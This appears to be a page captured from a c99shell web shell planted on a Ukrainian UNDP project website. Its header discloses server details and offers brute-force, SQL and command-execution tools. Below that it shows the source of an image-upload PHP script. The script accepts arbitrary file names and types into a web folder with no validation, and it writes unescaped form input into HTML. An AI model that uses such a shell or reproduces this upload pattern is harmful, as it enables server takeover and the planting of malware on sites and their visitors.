msdp.undp.org.ua - c99shell

!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!
Software: Apache/2.2.22 (Debian). PHP/5.6.36 uname -a: Linux h05.hvosting.ua 4.9.110-amd64 #3 SMP Sun Nov 4 16:27:09 UTC 2018 x86_64 uid=1389(h33678) gid=1099(h33678) groups=1099(h33678),502(mgrsecure) Safe-mode: OFF (not secure) /home/h33678/data/www/msdp.undp.org.ua/modules-alien/myuploader/ drwxr-xr-x Free 106.8 GB of 200.55 GB (53.25%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php

$destination_dir = "uploaded/";
$targetPath = dirname($_SERVER['SCRIPT_URI']) . "/";

$html_start = "
<!doctype html public \"-//w3c//dtd html 4.0 transitional//en\">

<html>
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\">
<title>Upload results</title>
</head>
<body>
";

$html_end = "
</body>
</html>
";

// Check if there are AdditionalStringVariable
$result = "AdditionalStringVariable: " . $_POST["AdditionalStringVariable"];
$result .= "<br>";


// Process value of QIU_thumbnails_Imagedata field, this is JPEG-files array of generated thumbnails
if($_FILES[QIU_thumbnails_Imagedata])
{
    foreach ($_FILES[QIU_thumbnails_Imagedata][name] as $key => $value) 
    {
        $uploadfile = $destination_dir . basename($_FILES[QIU_thumbnails_Imagedata][name][$key]);
        
    
        if (move_uploaded_file($_FILES['QIU_thumbnails_Imagedata']['tmp_name'][$key], $uploadfile)) 
        {
            
            $big_image_name = $_FILES[Imagedata][name][$key];
        
            $result .= "<a href='" .$big_image_name. "'>" . "<img border = '0' src='".$value . "'/></a><br><br>";
        }
    }
}
//
$result .= "<br>";


// Process value of Imagedata field, this is JPEG-files array

foreach ($_FILES[Imagedata][name] as $key => $value) 
{
    $uploadfile = $destination_dir . basename($_FILES[Imagedata][name][$key]);

    if (move_uploaded_file($_FILES['Imagedata']['tmp_name'][$key], $uploadfile)) 
    {
        $result .= "File uploaded: <a href='".  $value . "'>" . $value . "</a><br>";
    }
}


//
$result .= "<br>";




//
// Process  GlobalControlData field, this is the array of serialized data for Global controls 
// the value for each control is: id|value
if($_POST[GlobalControlData])
{
    foreach ($_POST[GlobalControlData] as $key => $value) 
    {
        $globalControlExploded =  explode("|", $value);
        $result .= "\n" . "GlobalControlData:\n\t" . $globalControlExploded[0] ."\t:\t" . $globalControlExploded[1] . "<br>";
    }
}

//
// Process LocalControlData  field, this is the array of serialized data for Local controls 
// value for each image is: image||id1|value1^id2|value2^id3|value3, where image - is picture name, id - is unique control ID , and a value - control value
if($_POST[LocalControlData])
{
    foreach ($_POST[LocalControlData] as $key => $value) 
    {
        $exploded = explode("||", $value);
        $parentFile = $exploded[0];

        $result .= "<br>" . $exploded[0] . "<br>";

        $explodedToControls = explode("^", $exploded[1]);

        foreach ($explodedToControls as $cnt => $val) 
        {
            $eachControl = explode("|", $val);
            $result .= "\tcontrol:\t" . $eachControl[0] . ", value:\t" . $eachControl[1] . "<br>";

        }
        //
    }
}
//

$result = $html_start . $result . $html_end;

//
if(@$fp = fopen($destination_dir.'index.html', 'w')) {
      fwrite($fp, $result);
      fclose($fp);
}

echo $targetPath . $destination_dir;

?>

:: Command execute ::
Enter:	Select: